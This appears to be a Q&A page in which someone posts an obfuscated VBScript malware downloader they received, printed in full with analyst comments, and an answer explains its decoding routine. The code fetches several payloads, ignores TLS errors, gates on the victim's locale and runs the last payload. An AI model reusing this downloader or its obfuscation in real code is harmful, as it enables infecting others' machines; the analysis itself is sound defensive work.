Decrypt virus - vbscript

' Obfuscated VBScript downloader (the sample discussed on this page).
' Option Explicit forces every name to be declared, but the very next line
' turns every runtime error into a silent no-op: a failed CreateObject, a
' failed download or an undeclared name (see buoyc2863 further down) never
' stops the script. When analysing, remember that most "errors" simply vanish.
Option Explicit
On Error Resume Next
' Module-level names. They are deliberately meaningless; what each one holds
' is only visible once the literal assigned to it is decoded with uckp9923().
dim rbs309
dim tadjakmnmfrg4460
dim icsnvk206
dim wsmp1276
dim falkal1610
dim rfqgobyeyrp5319
dim gtxhgi5556
dim mll8810
dim qxat8709
dim hgurgqrv3280
dim baknqdo6857
dim cioslu3564
dim sndohhjq1214
dim lwwfaim8338
dim haprm493
dim iltkfxbb2382
dim dhydlcp7543
dim qpdu6740
dim gtlbowwr6975
dim xcyi8081
dim isfotb6795
dim uguojbssq5199
dim dycbyrmy5608
dim suqmi6111
dim mojspk6072
dim gwjdvxqxpi1867
dim syc9022
dim cwnilskntu6156
dim jycej9917
dim kaumen4761
dim hpml9179
dim stwjmww5737
dim mju2625
dim idmndh94
dim lkrm5932
dim kfdvhjl9992
dim fyv2635
dim njuv4832
dim ygvhoo991
dim twfygbvnne8124
' Key used by uckp9923(); assigned first because every line below depends on it.
dim kwjktixh825

' Decoder key, stored in clear text. Because the "encryption" is a plain
' running-key subtraction, every literal below can be recovered offline with a
' stand-alone copy of fdhtrhou8434/uckp9923 and this key — no need to run the
' script to find out what it does.
kwjktixh825         = "ijn34g"
' All configuration values are decoded at load time. From how they are used
' later: wsmp1276/falkal1610/cioslu3564/baknqdo6857/dhydlcp7543 are passed to
' CreateObject (ProgIDs), rbs309/iltkfxbb2382/haprm493 are concatenated into
' the URL given to BinaryGetURL, kfdvhjl9992/fyv2635/njuv4832/hgurgqrv3280
' build the drop path, qpdu6740 becomes the HTTP user-agent, and sndohhjq1214
' is the command prefix handed to .run. Decoded values are not reproduced here.
rbs309              = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))
' Decoding an empty literal yields "" — this ends up as the trailing argument of the .run call.
tadjakmnmfrg4460    = uckp9923(fdhtrhou8434(""))
icsnvk206           = uckp9923(fdhtrhou8434("šÝ›—•ÖÕ"))
wsmp1276            = uckp9923(fdhtrhou8434("ÔÜݪ¨Ì·˜â£Ù̽Å"))
falkal1610          = uckp9923(fdhtrhou8434("ÕÖÓ›‡•ÝÚ×¥—ºÀ"))
rfqgobyeyrp5319     = uckp9923(fdhtrhou8434("Õ×â›b—"))
gtxhgi5556          = uckp9923(fdhtrhou8434("ÐÚØa—"))
mll8810             = uckp9923(fdhtrhou8434("¹º¯X"))
qxat8709            = uckp9923(fdhtrhou8434("Ž«Âtx"))
hgurgqrv3280        = uckp9923(fdhtrhou8434("ÏÓÕa¬"))
baknqdo6857         = uckp9923(fdhtrhou8434("ÖËÓ¥¨º—¬²‚x¨"))
cioslu3564          = uckp9923(fdhtrhou8434("ÝÍÓ–¶ÖÏ⦭ºÎÖ×ybÎ×Óâ£Ù̽"))
sndohhjq1214        = uckp9923(fdhtrhou8434("‰ÝS™ßΘ f¦ÝÜÑÓ¥"))
lwwfaim8338         = uckp9923(fdhtrhou8434("ÍÓ"))
haprm493            = uckp9923(fdhtrhou8434("Õ×â›bÊ"))
iltkfxbb2382        = uckp9923(fdhtrhou8434("Õ×â›b"))
dhydlcp7543         = uckp9923(fdhtrhou8434("š˜£a¨ÚÎßߘ†×ÝÞ¶¡¾—Úâ§|ÕÒÁ"))
qpdu6740            = uckp9923(fdhtrhou8434("™˜Ÿb¦ÌÝÞÓš“àÛËÜœ–"))
kfdvhjl9992         = uckp9923(fdhtrhou8434("ÅÍן–ܹÆᥙھƨv"))
fyv2635             = uckp9923(fdhtrhou8434("ÅÝà˜§¼‰ÖÚtÚÐØק¨Ì¼ŠÒ¡•‡ÜÞܘ¡ÜÌÙ²nª"))
njuv4832            = uckp9923(fdhtrhou8434("Åâ"))
' Compared with the OS language later: 1046 is the Windows LCID for
' Portuguese (Brazil), i.e. the script gates its payload on the victim's locale.
twfygbvnne8124      =  1046
' Not declared above: under Option Explicit this is a "Variable is undefined"
' runtime error, swallowed by On Error Resume Next. The value is never read —
' BinaryGetURL compares against the string literal "buoyc2863", not this variable.
buoyc2863           = uckp9923(fdhtrhou8434("½½½ƒ"))


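' First obfuscation layer: removes every "@" from the literal. None of the
' literals on this page actually contain "@", so for this sample the function
' is an identity — it exists only to make the strings look like they need a
' second step.
'
' Str      the obfuscated literal. VBScript passes arguments ByRef by default;
'          the original overwrote the parameter (str and Str are the same
'          name), which would also rewrite a caller's variable. This version
'          leaves the argument untouched.
' returns  Str with all "@" characters removed; "" for "".
Function fdhtrhou8434(Str)
    fdhtrhou8434 = Replace(Str, "@", "")
End Function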

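' Second obfuscation layer, used for every configuration literal in the
' script. It is a running-key subtraction, not encryption: the input is
' reversed, each character code has the code of the next key character
' (kwjktixh825, cycling from position 1) subtracted from it, and the
' accumulated result is reversed again. With the key sitting in clear text a
' few lines above, the literals can be decoded offline with this routine.
'
' Str      the obfuscated literal (read only; the original overwrote this
'          ByRef parameter, which would also rewrite a caller's variable).
' returns  the decoded string; "" for "".
'
' Fixes over the pasted original: the If inside the For had no matching
' End If, which is a compile error for the whole script, and the parameter
' is no longer modified. Chr() still raises if a subtraction leaves the
' 0–255 range; the script's On Error Resume Next would hide that.
Function uckp9923(Str)
 Dim rbtac94, dxjc2225, mpbx3317, ogngfnwbr3141, umr8295, iael1408, wcdq
 wcdq     = StrReverse(Str)     ' private copy, so the argument is never written back
 dxjc2225 = Len(kwjktixh825)    ' key length
 mpbx3317 = 1                   ' 1-based position inside the key
 rbtac94  = ""
 ' Walking the reversed copy from its end is the same as walking Str from
 ' its start; the key position advances once per character and wraps.
 For ogngfnwbr3141 = Len(wcdq) To 1 Step -1
   umr8295  = Asc(Mid(wcdq, ogngfnwbr3141, 1))
   iael1408 = Asc(Mid(kwjktixh825, mpbx3317, 1))
   rbtac94  = rbtac94 & Chr(umr8295 - iael1408)
   mpbx3317 = mpbx3317 + 1
   If mpbx3317 > dxjc2225 Then
     mpbx3317 = 1
   End If
 Next
 ' The result was built in input order; the final reverse is part of the scheme.
 uckp9923 = StrReverse(rbtac94)
End Function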


' --- runtime setup ---
' Every ProgID is a decoded constant; the object types named below are
' inferred from the members the script calls on them, so confirm by decoding.
' Under On Error Resume Next a failed CreateObject leaves the variable empty
' and every later member call silently does nothing.
' A double-quote character, used to quote the drop path in the final .run command.
gtlbowwr6975    = chr(34)
' Only .ComputerName is read from this object (consistent with WScript.Network).
set xcyi8081    = CreateObject(wsmp1276)
' Only .run is called on this object, at the very end (consistent with WScript.Shell).
Set isfotb6795  = WScript.CreateObject(falkal1610)
dycbyrmy5608    =  xcyi8081.ComputerName
' FolderExists / CreateFolder / OpenTextFile / FileExists are called on this
' object (consistent with Scripting.FileSystemObject).
Set mojspk6072  = CreateObject(cioslu3564)

' Staging folder: a decoded base path (kfdvhjl9992 if that folder exists,
' otherwise the fallback fyv2635) + the first three characters of the host
' name + a decoded suffix. The per-host prefix means the dropped paths differ
' from machine to machine; search on the pattern, not on a fixed name.
if mojspk6072.FolderExists(kfdvhjl9992) then 
    uguojbssq5199 = kfdvhjl9992  &  Left(dycbyrmy5608, 3)   &   njuv4832
else
    uguojbssq5199 = fyv2635  &  Left(dycbyrmy5608, 3)  &  njuv4832
end if

' Final drop file: staging folder + host-name prefix + decoded extension.
' This is both the target of the last download and the file handed to .run.
suqmi6111       = uguojbssq5199   &  Left(dycbyrmy5608, 3)  &  hgurgqrv3280

' Synchronous HTTP GET helper. The object comes from the decoded ProgID
' dhydlcp7543; the members used (SetTimeouts, Option(n), Open, Send, Status,
' ResponseBody) match WinHttp.WinHttpRequest — confirm by decoding.
'
' strURL   absolute URL to fetch.
' returns  the raw response body (a byte array) only when the HTTP status is
'          exactly 200. On any other status, or on a failed request, the
'          function variable is never assigned, so the caller receives Empty;
'          SaveBinaryData discards that silently and the calling loop retries.
Function BinaryGetURL(strURL)
  Dim objWinHttp
  Dim lngTimeout
  Dim strMethod
  Dim strPostData
  Dim strUserAgentString
  Dim intSslErrorIgnoreFlags
  Dim blnEnableRedirects
  Dim blnEnableHttpsToHttpRedirects

  ' 59 s, applied to each of the four WinHTTP timeouts below.
  lngTimeout                    = 59000
  strMethod                     = "GET"
  strPostData                   = ""
  ' 13056 = &H3300: ignore every TLS certificate error (unknown CA, wrong
  ' usage, CN mismatch, expired). HTTPS therefore authenticates nothing here;
  ' an interception proxy or a sinkhole is accepted without complaint.
  intSslErrorIgnoreFlags        = 13056
  blnEnableRedirects            = True
  ' Also follows redirects that downgrade HTTPS to plain HTTP.
  blnEnableHttpsToHttpRedirects = True
  Set objWinHttp                = CreateObject(dhydlcp7543)
  objWinHttp.SetTimeouts lngTimeout, lngTimeout, lngTimeout, lngTimeout
  ' Option 0 = UserAgentString (a decoded constant — a useful network
  ' artefact for detection), 4 = SslErrorIgnoreFlags, 6 = EnableRedirects,
  ' 12 = EnableHttpsToHttpRedirects.
  objWinHttp.Option(0)          = qpdu6740
  objWinHttp.Option(4)          = intSslErrorIgnoreFlags
  objWinHttp.Option(6)          = blnEnableRedirects
  objWinHttp.Option(12)         = blnEnableHttpsToHttpRedirects
  ' Third argument False = synchronous: Send blocks until the response arrives or times out.
  objWinHttp.Open strMethod, strURL, False 
  ' Dead branch: strMethod is always "GET", so it never equals the literal
  ' "buoyc2863" (note: the literal, not the module variable of that name).
  ' The "_" continuation followed by text on the same line is also malformed
  ' VBScript — most likely a line break lost when the sample was pasted.
  If strMethod = "buoyc2863" Then
    objWinHttp.setRequestHeader "Content-type", _ "application/x-www-form-urlencoded"
  End If

  objWinHttp.Send  strPostData 
  If (objWinHttp.Status = 200) Then
    BinaryGetURL = objWinHttp.ResponseBody
  End If
  Set objWinHttp = Nothing
End Function

' Writes a downloaded byte array to disk through an object created from the
' decoded ProgID baknqdo6857; the Type / Open / Write / SaveToFile members
' match ADODB.Stream (Type 1 = adTypeBinary, SaveToFile mode 2 =
' adSaveCreateOverWrite) — confirm by decoding.
'
' arrByteArray  expected to be the ResponseBody returned by BinaryGetURL.
' strFN         destination path; an existing file is overwritten.
' Nothing is written when arrByteArray is not an array (VarType < 8192,
' where 8192 = vbArray). That is how a failed download — Empty from
' BinaryGetURL — is dropped without any error and without a partial file.
' No return value.
Function SaveBinaryData(arrByteArray, strFN)
dim ryu9878, vocehkn515
ryu9878 = strFN
' 2 = adSaveCreateOverWrite
vocehkn515 = 2
  If VarType(arrByteArray) >= 8192 Then
    Dim objBS
    Set objBS = CreateObject(baknqdo6857)
    with objBS
        ' 1 = adTypeBinary: the body is written byte for byte, no text conversion.
        .Type = 1 
        .Open()
        .Write(arrByteArray)
        .SaveToFile ryu9878 , vocehkn515
    End With

  End If 
End Function 
 ' --- locale gate, marker file, download stages, launch ---
 ' GetObject on a decoded moniker, then ExecQuery and a read of .OSlanguage,
 ' is the shape of a WMI query (Win32_OperatingSystem exposes OSLanguage);
 ' the namespace and class names are inside the two decoded strings — confirm
 ' by decoding rather than assuming.
 Set stwjmww5737 = GetObject(uckp9923(fdhtrhou8434("›àÛœ—ÃÝÙÝ¥•ÅÆ°™ÛÊØݦ¦ÌÙ××p ÌßϺ¡£ÐÝËÜ¢§ÙÎÚÛœ¯¡ÜÞÛš¡ÕÒá")))
 Set mju2625 = stwjmww5737.ExecQuery(uckp9923(fdhtrhou8434("ÖÏ⦭ºÐØק•ÙÎÚ½’fš×ÓÅS¡ÖÛÐŽ]TÛÌÏÚ˜‡")))
 For Each idmndh94 in mju2625
lkrm5932 = idmndh94.OSlanguage
 Next
' Created unconditionally, even on hosts that fail the gate below: an empty
' host-name-prefixed folder at the staging path is a trace left on every
' machine the script ran on.
mojspk6072.CreateFolder(uguojbssq5199)
' Gate: the payload stages run only when (a) the marker file does not exist
' yet — so each host is processed once — and (b) the OS language equals
' 1046 (LCID for Portuguese/Brazil, set at twfygbvnne8124). A sandbox with
' any other OS language never reaches the downloads; keep that in mind when
' detonating this sample.
If (mojspk6072.FileExists(uguojbssq5199 & lwwfaim8338) = false and twfygbvnne8124 = lkrm5932) Then
' OpenTextFile(path, 8, True, False): 8 = ForAppending, create if missing,
' ASCII. The single line written is the decoded constant icsnvk206.
Set gwjdvxqxpi1867 = mojspk6072.OpenTextFile(uguojbssq5199 & lwwfaim8338,8,true,false)
gwjdvxqxpi1867.WriteLine icsnvk206
gwjdvxqxpi1867.Close
' Four download stages. Each loop repeats until the target file exists and
' has no retry limit or delay: when the server is unreachable or blocked,
' BinaryGetURL returns Empty, SaveBinaryData writes nothing, and the loop
' spins, re-requesting the same URL back to back. That unthrottled stream of
' identical outbound requests from the script host is an easy thing to alert
' on, and blocking the URL alone does not make the script exit.
' Three URLs differ only by a one-letter infix ("o", "e") before the decoded
' suffix; the saved names are the first two characters of the host name
' plus "k", "o" or "e".
Do
SaveBinaryData BinaryGetURL(rbs309 & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "k"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "k") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "o" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "o"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "o") = true
Do
SaveBinaryData BinaryGetURL(rbs309 & "e" & iltkfxbb2382), uguojbssq5199 & Left(dycbyrmy5608, 2) & "e"
Loop Until mojspk6072.FileExists(uguojbssq5199 & Left(dycbyrmy5608, 2) & "e") = true
' Last stage is saved under the full drop path suqmi6111 built earlier.
Do
SaveBinaryData BinaryGetURL(rbs309 & haprm493), suqmi6111
Loop Until mojspk6072.FileExists(suqmi6111) = true
' Launch: decoded command prefix + the drop path in double quotes + a space
' + tadjakmnmfrg4460, which decodes from an empty literal and so is "".
' A child process started by the script host with a host-name-prefixed
' argument in the staging folder is the point to catch in process telemetry.
isfotb6795.run sndohhjq1214 & gtlbowwr6975 & suqmi6111 & gtlbowwr6975 &  " " & tadjakmnmfrg4460
End If

I received a virus written in VBScript and would like to learn how to decrypt it. I would like to know what steps or subjects I need to study or research in order to decrypt it, and whether there is a site or program that does this. Thanks to anyone who can help me.

    
asked by anonymous 10.12.2015 / 22:30

1 answer


Basically it's a substitution game. I do not want to walk through the whole function, otherwise the answer will be immense (I may change my mind later), but here are the main steps to give you an idea:

You have known parts, just change them until the code is readable.

For example, the fdhtrhou8434 function basically replaces @ with nothing, so we can eliminate it from all lines that do not contain @. For example

rbs309 = uckp9923(fdhtrhou8434("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ"))

is the same as

rbs309 = uckp9923("ÊÌâbd™à×Ϙ¨–žšŸadœš˜¦lb—™œbn×ÝÞÖ")

As for the uckp9923 function, it basically walks the string from end to start and subtracts, character by character, the codes of the string "ijn34g" held in kwjktixh825:

  umr8295   = asc(Mid(str,ogngfnwbr3141,1))
  iael1408  = Asc(Mid(kwjktixh825,mpbx3317,1))
  rbtac94   = rbtac94  &  chr(umr8295 - iael1408)

If you apply this to the scrambled strings assigned to the variables, you will get a series of readable strings.

These strings will show you where the BinaryGetURL(strURL) function downloads some code — which may be malware, for example — and writes it to your hard drive using the SaveBinaryData function.

The code is merely obfuscated, just to make work for the reader and keep its intent from being visible on a first read; it is basically a typical script-kiddie technique.

Just look at how much more normal the code looks after simply renaming a few variables, which can easily be done with the "find and replace" of any code editor:

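' The sample's decoder with readable names. chave is the key ("ijn34g" in
' the sample, where it is called kwjktixh825). Per input character the code
' of the next key character is subtracted, cycling through the key; the
' input is reversed before and the result after, so the scheme is trivially
' reversible with the key. The one fix compared with the pasted version is
' the End If closing the If inside the loop — without it VBScript does not
' compile the function at all.
Function uckp9923(Str)
 resultado      = "" 
 tamanhoChave   = Len( chave )
 iChave         = 1
 tamanhoEntrada = Len(Str) 
 ' str and Str are the same variable: VBScript is case-insensitive, and the
 ' parameter is ByRef, so a caller's variable would be reversed as well.
 str            = StrReverse(Str) 

 For i = tamanhoEntrada To 1 Step -1
    letraEntrada = Asc( Mid( Str, i, 1 ) )
    letraChave   = Asc( Mid( chave, iChave, 1))
    resultado    = resultado&  chr(letraEntrada - letraChave)
    um = 1
    iChave = iChave + um
    um = 1

    ' Wrap around to the first key character.
    If iChave > tamanhoChave Then 
      iChave = um
    End If
 Next
 resultado = StrReverse(resultado)
 uckp9923  = resultado
End Function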

It's exactly the same function; I just changed the variable names to make it easier to read.

    
10.12.2015 / 23:14